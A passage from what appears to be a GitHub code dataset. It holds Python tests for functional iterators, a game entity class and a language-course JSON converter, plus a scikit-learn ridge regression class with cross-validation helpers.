result:\n assert all([x < 100 for x in chunk])\n assert len(chunk) <= 6\n i += len(chunk)\n\n def test_iter_each_unique(self):\n data = randint(1, 100, 1000)\n f = F.iter_each_unique()\n result = f(iter(data))\n validate_generator(iter(sorted(result)), iter(sorted(set(data))))\n\n def test_iter_each_reverse(self):\n data = randint(1, 100, 1000)\n f = F.iter_reverse()\n result = f(iter(data))\n validate_generator(result, data[::-1])\n\n def test_zip_each_with(self):\n data = list(range(1000))\n data2 = list(range(1000, 2000))\n data3 = list(range(3000, 4000))\n f = F.zip_each_with(data2, data3)\n result = f(iter(data))\n validate_generator(result, zip(data2, data3, data))\n\n # ensure result can be obtained again...\n result = f(iter(data))\n validate_generator(result, zip(data2, data3, data))\n\n def test_zip_each_with_first(self):\n data = list(range(1000))\n data2 = list(range(1000, 2000))\n data3 = list(range(3000, 4000))\n f = F.zip_each_with(data2, data3, first=True)\n result = f(data)\n validate_generator(result, zip(data, data2, data3))\n\n def test_zipmap_with_each(self):\n data = [0, 10, 3]\n f = F.zipmap_each_with(\n lambda x: x + 1,\n lambda x: x * 2,\n lambda x: x * 3,\n )\n result = f(iter(data))\n assert list(result) == [1, 20, 9]\n\n def test_reduce_each(self):\n data = list(range(1000))\n data2 = list(range(1000, 2000))\n data3 = list(range(3000, 4000))\n data4 = zip(data, data2, data3)\n expected = [i + (i + 1000) + (i + 3000) for i in data]\n result = F.reduce_each(lambda a, b: a + 
b)(iter(data4))\n validate_generator(result, expected)\n\n\nclass TestComplexFunctions:\n def test_fn_tee_zip_reduce(self):\n data = iter(range(10))\n\n piped = F.compose(\n F.tee_all(),\n F.zip_all(),\n F.reduce_all(lambda a, b: a + b),\n )\n\n print(list(piped(data)))\n\n def test_try_catch(self):\n data = iter(range(10))\n\n def raise_if_over_5(x):\n if x > 5:\n raise ValueError\n return x\n\n piped = F.compose(\n F.map_each(raise_if_over_5),\n F.trycatch(ValueError, catch_yields=\"opps\"),\n )\n\n for x in piped(data):\n print(x)\n\n def test_try_catch_fails_to_catch(self):\n data = iter(range(10))\n\n def raise_if_over_5(x):\n if x > 5:\n raise TypeError\n return x\n\n piped = F.compose(\n F.map_each(raise_if_over_5),\n F.trycatch(ValueError, catch_yields=\"opps\"),\n )\n\n with pytest.raises(TypeError):\n for x in piped(data):\n print(x)\n\n def test_map_all_if(self):\n data = iter(range(10))\n piped = F.compose(\n F.tee_all(),\n F.enumerate_each(),\n F.map_all_if(lambda x: x[0] == 0, lambda x: x[1], lambda x: x[1]),\n F.chain_each(),\n )\n\n result = piped(data)\n print(list(result))\n for r in result:\n print(list(r))\n\n def test_tee_pipe(self):\n data = randint(1, 1000, 100)\n f = F.compose(\n F.tee_pipe(\n F.apply_each(print),\n list,\n )\n )\n result = f(iter(data))\n validate_generator(result, data)\n\n def test_tee_consume(self):\n data = randint(1, 1000, 100)\n f = F.compose(F.tee_consume(F.iter_count(3)))\n result = f(iter(data))\n validate_generator(result, data[3:])\n\n def test_repeat_raises_type_error(self):\n x = \"string\"\n with pytest.raises(TypeError):\n F.repeat_all(x)(iter(randint(1, 10, 10)))\n\n def test_repeat_raises_value_error(self):\n x = -1\n with pytest.raises(ValueError):\n F.repeat_all(x)(iter(randint(1, 10, 10)))\n\n def test_iter_step_raises_type_error(self):\n x = \"string\"\n with pytest.raises(TypeError):\n F.iter_step(x)(iter(randint(1, 10, 10)))\n\n def test_iter_step_raises_value_error(self):\n x = -1\n with pytest.raises(ValueError):\n F.iter_step(x)(iter(randint(1, 10, 10)))\n\n def test_tee_pipe_yield(self):\n\n data = range(20)\n\n f = F.compose(\n F.tee_pipe_yield(F.filter_each(lambda x: x < 2)),\n F.iter_reverse(),\n F.chain_each(),\n )\n\n assert list(f(data)) == list(range(20)) + [0, 1]\n","repo_name":"jvrana/caldera","sub_path":"tests/test_utils/test_functional/test_functional_iterators.py","file_name":"test_functional_iterators.py","file_ext":"py","file_size_in_byte":14992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12525081733","text":"import numpy\nimport pandas\nfrom joblib import delayed, Parallel\n\nfrom sklearn import preprocessing\nfrom sklearn.base import BaseEstimator\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.model_selection import KFold, GridSearchCV, cross_val_score, train_test_split, learning_curve, cross_validate, ParameterGrid, ParameterSampler\nfrom sklearn.utils import check_X_y, check_array\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom dataTypes import ElaborationResult\n\n\nclass BaseRidgeRegression(BaseEstimator):\n nested_cross_validation_trials = 10\n\n def __init__(self, alpha: float = 1.0):\n self.alpha = alpha\n self.R2 = []\n self.MSE = []\n\n def nestedCrossValidation(self, X: pandas.DataFrame, y: pandas.Series):\n EX_CV = KFold(n_splits=self.nested_cross_validation_trials, shuffle=True, random_state=1986)\n IN_CV = KFold(n_splits=5, shuffle=True)\n\n 
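# [Hedged sketch] The loop below hand-rolls nested cross-validation over the
# outer/inner KFold splitters. For reference, stock scikit-learn expresses the
# same estimate; Ridge() is an assumption standing in for this class, not the
# repository's estimator:
def sklearn_nested_cv(X, y, alphas):
    from sklearn.linear_model import Ridge
    from sklearn.model_selection import GridSearchCV, KFold, cross_val_score
    inner = KFold(n_splits=5, shuffle=True)
    outer = KFold(n_splits=10, shuffle=True, random_state=1986)
    search = GridSearchCV(Ridge(), {"alpha": list(alphas)}, cv=inner)
    # each outer split refits the inner grid search, keeping the score unbiased
    return cross_val_score(search, X, y, cv=outer)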
outer_scores = []\n variance = []\n best_inner_list = []\n best_inner_alpha = 0\n\n for (i, (EX_train_idx, EX_test_idx)) in enumerate(EX_CV.split(X, y)):\n EX_x_train, EX_x_test = X.iloc[EX_train_idx], X.iloc[EX_test_idx]\n EX_y_train, EX_y_test = y.iloc[EX_train_idx], y.iloc[EX_test_idx]\n\n for (j, (IN_train_idx, IN_test_idx)) in enumerate(IN_CV.split(EX_x_train, EX_y_train)):\n def _fit(x_train: pandas.DataFrame, x_test: pandas.DataFrame, y_train: pandas.Series, y_test: pandas.Series, ɑ: float):\n self.alpha = ɑ\n self.fit(x_train, y_train)\n inner_grid_score = self.score(x_test, y_test)\n return inner_grid_score, ɑ\n\n IN_x_train, IN_x_test = EX_x_train.iloc[IN_train_idx], EX_x_train.iloc[IN_test_idx]\n IN_y_train, IN_y_test = EX_y_train.iloc[IN_train_idx], EX_y_train.iloc[IN_test_idx]\n\n IN_result = Parallel(n_jobs=-1)(delayed(_fit)(IN_x_train, IN_x_test, IN_y_train, IN_y_test, ɑ)\n for ɑ in self.alphas)\n\n IN_result = numpy.array(IN_result)\n best_idx = numpy.argmax(IN_result[:, 0])\n best_inner_alpha = IN_result[best_idx][1]\n best_inner_list.append(IN_result[best_idx])\n\n self.alpha = best_inner_alpha\n self.fit(EX_x_train, EX_y_train)\n\n score, pred = self.score_and_prediction(EX_x_test, EX_y_test)\n outer_scores.append(score)\n variance.append(numpy.var(pred))\n\n best_inner_list = numpy.array(best_inner_list)\n best_idx = numpy.argmax(best_inner_list[:, 0])\n best_alpha = best_inner_list[best_idx][1]\n\n self.best_alpha = best_alpha\n\n return numpy.array(variance), numpy.array(outer_scores), best_alpha\n\n def nestedCrossValidationKFold(self, X, y) -> None:\n p_grid = {\"alpha\": self.alphas}\n\n self.best_alphas_NestedCV = []\n self.best_alphas_NonNestedCV = []\n\n self.non_nested_scores = numpy.zeros(self.nested_cross_validation_trials)\n self.nested_scores = numpy.zeros(self.nested_cross_validation_trials)\n\n for i in range(self.nested_cross_validation_trials):\n inner_cv = KFold(n_splits=5, shuffle=True)\n outer_cv = KFold(n_splits=5, shuffle=True, random_state=1986)\n\n clf = GridSearchCV(estimator=self, param_grid=p_grid, cv=inner_cv, n_jobs=-1)\n clf.fit(X, y)\n\n self.non_nested_scores[i] = clf.best_score_\n self.best_alphas_NonNestedCV.append((clf.best_params_['alpha'], clf.best_score_))\n\n scores = cross_validate(clf, X=X, y=y, cv=outer_cv, return_estimator=True, n_jobs=-1)\n test_score = scores['test_score']\n j = numpy.argmax(test_score)\n self.best_alphas_NestedCV.append((scores['estimator'][j].best_params_['alpha'], test_score[j]))\n\n self.nested_scores[i] = test_score.mean()\n\n self.score_difference = self.non_nested_scores - self.nested_scores\n\n self.best_alphas_NestedCV = numpy.array(self.best_alphas_NestedCV)\n self.best_alphas_NonNestedCV = numpy.array(self.best_alphas_NonNestedCV)\n\n j = numpy.argmax(self.best_alphas_NestedCV[:, 1])\n self.best_alpha_NestedCV = self.best_alphas_NestedCV[j, 0]\n\n j = numpy.argmax(self.best_alphas_NonNestedCV[:, 1])\n self.best_alpha_NonNestedCV = self.best_alphas_NonNestedCV[j, 0]\n\n def crossValidationKFold(self, X: pandas.DataFrame, y: pandas.Series) -> None:\n self.R2.clear()\n self.MSE.clear()\n\n kf = KFold(n_splits=5, shuffle=True, random_state=1986)\n\n for ɑ in self.alphas:\n k_scores = []\n k_mses = []\n\n self.alpha = ɑ\n\n for train_index, test_index in kf.split(X):\n x_train, x_test = X.iloc[train_index], X.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n\n self.fit(x_train, y_train)\n\n y_pred = self.predict(x_test)\n\n score = r2_score(y_test, y_pred)\n mse = 
mean_squared_error(y_test, y_pred)\n\n k_scores.append(score)\n k_mses.append(mse)\n\n self.R2.append(numpy.mean(k_scores))\n self.MSE.append(numpy.mean(k_mses))\n\n def printBestScores(self) -> None:\n print(self.algo + ':')\n print(f'-best ɑ: {self.best_alpha}')\n print(f'-best MSE: {self.best_MSE}')\n print(f'-best R²: {self.best_R2}')\n\n def calculateScoring(self, alphas, x_train: pandas.DataFrame, y_train: pandas.Series, x_test: pandas.DataFrame, y_test: pandas.Series) -> None:\n self.MSE.clear()\n self.R2.clear()\n self.alphas = alphas\n\n for ɑ in self.alphas:\n self.alpha = ɑ\n self.fit(x_train, y_train)\n y_predict = self.predict(x_test)\n\n self.MSE.append(mean_squared_error(y_test, y_predict))\n self.R2.append(r2_score(y_test, y_predict))\n\n idx_best_r2 = numpy.argmax(self.R2)\n idx_best_mse = numpy.argmin(self.MSE)\n\n self.best_MSE = self.MSE[idx_best_mse]\n self.best_R2 = self.R2[idx_best_r2]\n\n self.best_alpha = self.alphas[idx_best_r2]\n self.alpha = self.best_alpha\n\n def trainBySize(self, sizes, X, y) -> numpy.ndarray:\n coef_list = []\n\n for s in sizes:\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=s, shuffle=True, random_state=1986)\n self.fit(X_train, y_train)\n coef_list.append(self.coef_)\n\n return numpy.array(coef_list)\n\n def fitPCA(self, n_components: int, X: numpy.ndarray):\n pca = PCA(n_components=n_components)\n pca.fit(X)\n coef_pca = pca.transform(X)\n self.pca_singular_values = pca.singular_values_\n\n return coef_pca\n\n def learningCurvePCA(self, sizes, n_components: int, X: numpy.ndarray, y: numpy.ndarray, scoring):\n X_pca = self.fitPCA(n_components, X)\n return learning_curve(self, X_pca, y, train_sizes=sizes, cv=5, scoring=scoring, n_jobs=-1)\n\n def fitPCABySize(self, sizes, X, y, n_components: int):\n coef_matrix = self.trainBySize(sizes, X, y)\n coef_pca = self.fitPCA(n_components, coef_matrix)\n\n return coef_pca\n\n def executeAll(self, S: pandas.DataFrame, y: pandas.Series, x_test: pandas.DataFrame, y_test: pandas.Series) -> ElaborationResult:\n S_ = S.to_numpy()\n y_ = y.to_numpy()\n x_test_ = x_test.to_numpy()\n y_test_ = y_test.to_numpy()\n\n self.fit(S_, y_)\n R = ElaborationResult(self.coef_, self.predict(x_test_))\n\n R.mape = mean_squared_error(y_test_, R.y_predict)\n R.r2 = r2_score(y_test_, R.y_predict)\n\n return R\n\n def score_and_prediction(self, x_test: pandas.DataFrame, y_test: pandas.Series):\n y_predict = self.predict(x_test)\n score = r2_score(y_test, y_predict)\n\n return score, y_predict\n\n def score(self, x_test: pandas.DataFrame, y_test: pandas.Series) -> numpy.float64:\n score, y_predict = self.score_and_prediction(x_test, y_test)\n\n return score\n\n def fit(self, X, y):\n \"\"\"A reference implementation of a fitting function.\n Parameters\n ----------\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\n The training input samples.\n y : array-like, shape (n_samples,) or (n_samples, n_outputs)\n The target values (class labels in classification, real numbers in\n regression).\n Returns\n -------\n self : object\n Returns self.\n \"\"\"\n X, y = check_X_y(X, y, accept_sparse=True)\n self.is_fitted_ = True\n\n y = y.reshape(-1, 1)\n\n # Compute the weighted arithmetic mean along the specified axis.\n S_wam = numpy.average(X, axis=0)\n y_wam = numpy.average(y, axis=0)\n\n S = X - S_wam\n y = y - y_wam\n\n # Normalization is the process of scaling individual samples to have unit norm.\n # This process can be useful if you plan to use a quadratic form such as the dot-product or 
any other kernel to quantify the similarity of any pair of samples.\n # This assumption is the base of the Vector Space Model often used in text classification and clustering contexts.\n # The function normalize provides a quick and easy way to perform this operation on a single array-like dataset, either using the l1 or l2 norms.\n S, norm_L2 = preprocessing.normalize(X=S, norm=\"l2\", axis=0, copy=False, return_norm=True)\n\n self.coef_ = self.calculateWeights(S, y) / norm_L2\n self.intercetta = y_wam - S_wam @ self.coef_.T\n\n # `fit` should always return `self`\n return self\n\n def predict(self, X):\n \"\"\" A reference implementation of a predicting function.\n Parameters\n ----------\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\n The training input samples.\n Returns\n -------\n y : ndarray, shape (n_samples,)\n Returns an array of ones.\n \"\"\"\n X = check_array(X, accept_sparse=True)\n check_is_fitted(self, 'is_fitted_')\n\n y_predict = X @ self.coef_.T + self.intercetta\n\n return y_predict\n\n # abstract\n def calculateWeights(self, S: numpy.ndarray, y: numpy.ndarray) -> numpy.ndarray:\n raise NotImplementedError(\"Please Implement this method\")\n","repo_name":"mikymaione/HousingPrices","sub_path":"SourceCode/HousingPrices/baseRidgeRegression.py","file_name":"baseRidgeRegression.py","file_ext":"py","file_size_in_byte":10584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71724946640","text":"from entity import Entity\nfrom weapon import Weapon\nimport unittest\n\n\nclass TestEntity(unittest.TestCase):\n\n def test_Entity_init(self):\n my_Entity = Entity(\"Ivan\", 100)\n self.assertEqual(my_Entity.name, \"Ivan\")\n self.assertEqual(my_Entity.health, 100)\n\n def test_hero_get_health(self):\n my_Entity = Entity(\"Ivan\", 100)\n self.assertEqual(my_Entity.get_health(), 100)\n\n def test_Entity_is_alive(self):\n my_Entity = Entity(\"Ivan\", 100)\n self.assertTrue(my_Entity.is_alive())\n\n def test_Entity_is_alive_dead(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 0\n self.assertFalse(my_Entity.is_alive())\n\n def test_Entity_take_damage(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.take_damage(50)\n self.assertEqual(my_Entity.get_health(), 50)\n\n def test_Entity_take_damage_float(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.take_damage(50.5)\n self.assertEqual(my_Entity.get_health(), 49.5)\n\n def test_Entity_take_healing(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 50\n my_Entity.take_healing(30)\n self.assertEqual(my_Entity.get_health(), 80)\n\n def test_Entity_take_healing_dead(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 0\n self.assertFalse(my_Entity.take_healing(30))\n self.assertEqual(my_Entity.get_health(), 0)\n\n def test_Entity_take_healing_maxhealing(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 100\n my_Entity.take_healing(10)\n self.assertEqual(my_Entity.get_health(), 100)\n\n def test_Entity_equip_weapon_no_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n self.assertEqual(my_Entity.weapon.type, \"Axe\")\n self.assertEqual(my_Entity.weapon.damage, 31)\n self.assertEqual(my_Entity.weapon.critical_strike_percent, 0.2)\n\n def test_Entity_has_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n self.assertTrue(my_Entity.has_weapon())\n\n def 
test_Entity_equip_weapon_with_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_weapon2 = Weapon(\"Sword\", 20, 0.5)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n my_Entity.equip_weapon(my_weapon2)\n self.assertEqual(my_Entity.weapon.type, \"Sword\")\n self.assertEqual(my_Entity.weapon.damage, 20)\n self.assertEqual(my_Entity.weapon.critical_strike_percent, 0.5)\n\n def test_Entity_attack_with_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n attack = my_weapon.damage * (1 + my_weapon.critical_strike_percent)\n true_attack = my_Entity.attack()\n self.assertEqual(attack, true_attack)\n\n def test_Entity_attack_no_weapon(self):\n my_Entity = Entity(\"Ivan\", 100)\n attack = 0\n true_attack = my_Entity.attack()\n self.assertEqual(attack, true_attack)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Hristiyan-Andreev/HackBuglaria","sub_path":"Week2/Dungeons and Pythons/entityTest.py","file_name":"entityTest.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3781220665","text":"from unittest.mock import patch\nfrom unittest import TestCase\nfrom liblili2json import get_course_data\nfrom liblili2json import get_skill_data\nfrom liblili2json import get_challenges_data\nfrom liblili2json import calculate_number_of_levels\nfrom liblili2json import get_word_challenges\nfrom liblili2json import get_phrase_challenges\nfrom liblili2json import get_cards_challenge\nfrom liblili2json import get_short_input_challenge\nfrom liblili2json import get_listening_challenge\nfrom liblili2json import get_chips_challenge\nfrom liblili2json import get_options_challenge\nfrom liblili2json import get_chips\nfrom liblili2json import get_dumb_opaque_id\nfrom liblili2json import clean_word\nfrom liblili2json import define_words_in_sentence\nfrom liblili2json import define_word\nfrom liblili2json.types import Phrase\nfrom liblili2json.types import Course\nfrom liblili2json.types import Word\nfrom liblili2json.types import DictionaryItem\nfrom . 
import fakes\n\n\ndef test_get_course_data_return_value():\n \"\"\"\n Tests the return value of get_course_data with the\n fakes.course1 object\n \"\"\"\n assert get_course_data(fakes.course1) == {\n \"languageName\": \"my language\",\n \"languageCode\": \"de\",\n \"specialCharacters\": [\"ä\", \"ß\"],\n \"license\": {\n \"name\": {\n \"short\": \"foo\",\n \"full\": \"foo bar license\",\n },\n \"link\": None,\n },\n \"modules\": [\n {\n \"title\": \"Basics\",\n \"skills\": [\n {\n \"title\": \"Masculine\",\n \"practiceHref\": \"masculine\",\n \"summary\": [\"lorem ipsum\"],\n \"imageSet\": [\"man1\", \"man2\", \"boy1\"],\n 'id': 'd7279e4777cd',\n \"levels\": 1,\n },\n {\n \"title\": \"Feminine\",\n \"practiceHref\": \"feminine\",\n \"imageSet\": [\"woman1\", \"woman2\", \"girl1\"],\n \"summary\": [\"foous\", \"apfel\", \"foous\", \"apfel\", \"foous barus\"],\n 'id': 'd7279e4777cd',\n \"levels\": 2,\n },\n {\n \"title\": \"Neuter\",\n \"summary\": [],\n \"practiceHref\": \"neuter\",\n \"imageSet\": [\"foo1\", \"bar1\", \"bar2\"],\n 'id': 'd7279e4777cd',\n \"levels\": 1,\n },\n ]\n },\n {\n \"title\": \"Phrases\",\n \"skills\": []\n }\n ]\n }\n\n\ndef test_get_course_data_return_value_2():\n \"\"\"\n Tests the return value of get_course_data with the\n fakes.course2 object\n \"\"\"\n assert get_course_data(fakes.course2) == {\n \"languageName\": \"another language\",\n \"languageCode\": \"tr\",\n \"specialCharacters\": [\"ç\", \"ş\"],\n \"license\": {\n \"name\": {\n \"short\": \"lorem\",\n \"full\": \"ipsum lorem license\"\n },\n \"link\": \"https://example.com/lipsum_license\",\n },\n \"modules\": [\n {\n \"title\": \"Animals\",\n \"skills\": [\n {\n 'id': 'd7279e4777cd',\n \"title\": \"Mammals and birds\",\n \"practiceHref\": \"mammals-and-birds\",\n \"summary\": [\"foous\"],\n \"levels\": 1,\n }\n ]\n },\n ]\n }\n\n\ndef test_calculate_number_of_levels():\n examples = [\n {\"words\": 0, \"phrases\": 0, \"result\": 1},\n {\"words\": 10, \"phrases\": 0, \"result\": 2},\n {\"words\": 0, \"phrases\": 10, \"result\": 3},\n {\"words\": 10, \"phrases\": 10, \"result\": 4},\n ]\n\n for example in examples:\n assert calculate_number_of_levels(\n example[\"words\"], example[\"phrases\"]) == example[\"result\"]\n\n\nclass TestGetSkillData(TestCase):\n def test_empty_skill(self):\n assert get_skill_data(fakes.emptySkill, fakes.courseEmpty) == {\n \"id\": \"d7279e4777cd\",\n \"levels\": 1,\n \"challenges\": []\n }\n\n @patch('liblili2json.calculate_number_of_levels')\n def test_correct_number_of_levels(self, mock):\n FAKE_NUMBER = \"fake number\"\n mock.return_value = FAKE_NUMBER\n converted_skill = get_skill_data(fakes.emptySkill, fakes.course1)\n assert converted_skill[\"levels\"] == FAKE_NUMBER\n\n @patch('liblili2json.calculate_number_of_levels')\n def test_calculates_levels_correctly(self, mock):\n get_skill_data(fakes.skills[1], fakes.course1)\n mock.assert_called_with(4, 1)\n\n @patch('liblili2json.get_challenges_data')\n def test_correct_challenges(self, mock):\n FAKE_CHALLENGES = \"fake challenges\"\n mock.return_value = FAKE_CHALLENGES\n converted_skill = get_skill_data(fakes.skills[1], fakes.course1)\n assert converted_skill[\"challenges\"] == FAKE_CHALLENGES\n\n @patch('liblili2json.get_challenges_data')\n def test_formats_challenges_correctly(self, mock):\n get_skill_data(fakes.skills[1], fakes.course1)\n mock.assert_called_with(fakes.skills[1], fakes.course1)\n\n\nclass TestGetChallengesData(TestCase):\n def test_empty_skill(self):\n assert get_challenges_data(fakes.emptySkill, 
fakes.course1) == []\n\n @patch('liblili2json.get_phrase_challenges')\n def test_generates_phrase_challenges_correctly(self, mock):\n get_challenges_data(fakes.skillWithPhrase, fakes.course1)\n mock.assert_called_with(fakes.phrase2, fakes.course1)\n\n @patch('liblili2json.get_phrase_challenges')\n def test_includes_every_phrase(self, mock):\n get_challenges_data(fakes.skillWith3Phrases, fakes.course1)\n assert mock.call_count == 3\n\n @patch('liblili2json.get_word_challenges')\n def test_generates_word_challenges_correctly(self, mock):\n get_challenges_data(fakes.skillWithWord, fakes.course1)\n mock.assert_called_with(fakes.word1, fakes.course1)\n\n @patch('liblili2json.get_word_challenges')\n def test_includes_every_word(self, mock):\n get_challenges_data(fakes.skillWith3Words, fakes.course1)\n assert mock.call_count == 3\n\n @patch('liblili2json.get_word_challenges')\n @patch('liblili2json.get_phrase_challenges')\n def test_returns_correct_challenges(self, mock1, mock2):\n\n mock1.return_value = [fakes.challenge1, fakes.challenge2]\n mock2.return_value = [fakes.challenge3, fakes.challenge4]\n assert get_challenges_data(fakes.skillWithPhraseAndWord, fakes.course1) == [\n fakes.challenge1, fakes.challenge2, fakes.challenge3, fakes.challenge4]\n\n\nclass TestGetWordChallenges(TestCase):\n @patch('liblili2json.challenge_types.get_cards_challenge')\n def test_includes_cards_challenges(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_word_challenges(fakes.word1, fakes.course1)[0] == fake_value\n\n @patch('liblili2json.challenge_types.get_short_input_challenge')\n def test_includes_short_input_challenges(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_word_challenges(fakes.word1, fakes.course1)[1] == fake_value\n\n @patch('liblili2json.challenge_types.get_listening_challenge')\n def test_includes_listening_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_word_challenges(fakes.word1, fakes.course1)[2] == fake_value\n\n\nclass TestGetPhraseChallenges(TestCase):\n @patch('liblili2json.challenge_types.get_options_challenge')\n def test_includes_options_challenges(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.phrase1, fakes.course1)[0] == fake_value\n\n @ patch('liblili2json.challenge_types.get_listening_challenge')\n def test_includes_listening_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.phrase1, fakes.course1)[1] == fake_value\n\n @ patch('liblili2json.challenge_types.get_chips_challenge')\n def test_includes_chips_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.long_phrase, fakes.course1)[2] == fake_value\n\n @ patch('liblili2json.challenge_types.get_reverse_chips_challenge')\n def test_includes_reverse_chips_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.long_phrase, fakes.course1)[3] == fake_value\n\n def test_returns_correct_number_of_challenged(self):\n assert len(get_phrase_challenges(\n fakes.long_phrase, fakes.course1)) == 4\n\n def test_doesnt_include_chips_if_sentence_is_short(self):\n assert len(list(filter(\n lambda x: x[\"type\"] == \"chips\", get_phrase_challenges(\n fakes.customize(\n fakes.phrase1,\n 
in_target_language=[\"foo\"],\n in_source_language=[\"bar\"],\n ), fakes.course1)))) == 0\n\n\nclass TestGetCardsChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_cards_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': '95e24ac99aa9',\n \"type\": \"cards\",\n \"formInTargetLanguage\": \"foous\",\n \"meaningInSourceLanguage\": \"foo\",\n \"priority\": 0,\n 'group': 'aab69500f014',\n 'pictures': ['foo', 'bar', 'baz']\n }\n\n def test_returns_correct_value2(self):\n challenge = get_cards_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': '22bd7b11c2c9',\n \"type\": \"cards\",\n \"formInTargetLanguage\": \"apfel\",\n \"meaningInSourceLanguage\": \"apple\",\n \"priority\": 0,\n 'group': '9dbe235cb2d6',\n 'pictures': ['1', '2', '3']\n }\n\n\nclass TestGetOptionsChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_options_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': 'db8fd4cec19f',\n \"type\": \"options\",\n \"formInTargetLanguage\": \"foous\",\n \"meaningInSourceLanguage\": \"foo\",\n \"priority\": 0,\n 'group': 'aab69500f014',\n }\n\n def test_returns_correct_value2(self):\n challenge = get_options_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': 'e50475a646e2',\n \"type\": \"options\",\n \"formInTargetLanguage\": \"apfel\",\n \"meaningInSourceLanguage\": \"apple\",\n \"priority\": 0,\n 'group': '9dbe235cb2d6',\n }\n\n\nclass TestGetShortInputChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_short_input_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': '749e7c734898',\n \"type\": \"shortInput\",\n 'pictures': ['foo', 'bar', 'baz'],\n \"formInTargetLanguage\": [\"foous\"],\n 'phrase': [{'word': 'foo'}],\n \"priority\": 1,\n 'group': 'aab69500f014',\n }\n\n def test_returns_correct_value2(self):\n challenge = get_short_input_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': '5f1b4778039c',\n \"type\": \"shortInput\",\n 'pictures': ['1', '2', '3'],\n \"formInTargetLanguage\": [\"apfel\"],\n 'phrase': [{'word': 'apple'}],\n \"priority\": 1,\n 'group': '9dbe235cb2d6',\n }\n\n\nclass TestListeningChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_listening_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': 'ae89bd25c323',\n \"type\": \"listeningExercise\",\n \"answer\": \"foous\",\n \"meaning\": \"foo\",\n \"priority\": 1,\n 'group': 'aab69500f014',\n 'audio': '3f981d854531e9f376ae06cb8449a6e997972d3c1b598f9a00b481ef307a469d'\n }\n\n def test_returns_correct_value2(self):\n challenge = get_listening_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': '7de4d5b7f106',\n \"type\": \"listeningExercise\",\n \"answer\": \"apfel\",\n \"meaning\": \"apple\",\n \"priority\": 1,\n 'group': '9dbe235cb2d6',\n 'audio': 'f38b5ac2a5e36c336eed306d56ed517bfd78a728321be0b87db5def8ff8abc3d'\n }\n\n\nclass TestChipsChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_chips_challenge(fakes.phrase1, fakes.course1)\n assert challenge == {\n \"type\": \"chips\",\n \"translatesToSourceLanguage\": False,\n \"phrase\": [\n {\"word\": \"foo\"},\n {\"word\": \"bar\"},\n ],\n 'id': '9f9b09771a07',\n 'group': '930c4c4e7552',\n \"priority\": 2,\n \"chips\": [\"foous\", \"barus\"],\n \"solutions\": [[\"foous\", \"barus\"]],\n \"formattedSolution\": \"foous barus\",\n }\n\n @patch('liblili2json.challenge_types.get_chips')\n def 
test_returns_correct_value2(self, get_chips):\n        get_chips.return_value = fakes.fake_value()\n        challenge = get_chips_challenge(\n            fakes.phrase_with_alternatives, fakes.course1)\n        assert challenge == {\n            \"type\": \"chips\",\n            \"translatesToSourceLanguage\": False,\n            \"phrase\": [\n                {\"word\": \"foo\"},\n                {\"word\": \"bar\"},\n                {\"word\": \"foo\"},\n                {\"word\": \"bar\"},\n            ],\n            'id': '4b0e9208ce1b',\n            'group': '66a39e74a2c8',\n            \"priority\": 2,\n            \"solutions\": [get_chips.return_value, get_chips.return_value],\n            \"chips\": get_chips.return_value,\n            \"formattedSolution\": \"foous barus foous barus \",\n        }\n\n    @patch('liblili2json.challenge_types.get_chips')\n    def test_calls_get_chips_with_correct_value(self, get_chips):\n        fake_phrase = 